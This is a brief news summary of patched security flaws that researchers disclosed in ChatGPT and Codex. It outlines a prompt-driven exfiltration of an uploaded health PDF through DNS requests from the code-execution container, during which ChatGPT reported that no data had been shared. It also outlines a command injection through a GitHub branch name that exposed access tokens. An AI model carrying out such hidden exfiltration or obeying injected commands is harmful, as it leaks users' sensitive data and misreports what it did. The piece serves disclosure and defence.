Particle.news

OpenAI Fixes ChatGPT Data Leak Flaw and Codex GitHub Token Bug After Researcher Reports

The disclosures highlight gaps in AI runtime isolation, prompting calls for independent enterprise safeguards.

Overview

  • Check Point detailed the ChatGPT issue on Monday, while OpenAI had already shipped fixes on February 20 for ChatGPT and on February 5 for Codex.
  • The ChatGPT bug let a single malicious prompt use DNS, the system that looks up domain names, to ferry data out of the code-execution container without any warning.
  • A demo showed a health PDF uploaded to a custom GPT was quietly encoded into DNS requests and sent to an attacker server even as ChatGPT said no data had been shared.
  • BeyondTrust also found a Codex command-injection path in the GitHub branch name field that let attackers grab GitHub access tokens and run code in the agent’s container.
  • Researchers say there is no evidence of real-world abuse so far, and they urge organizations to add visibility and layered controls as AI tools process sensitive files and conversations.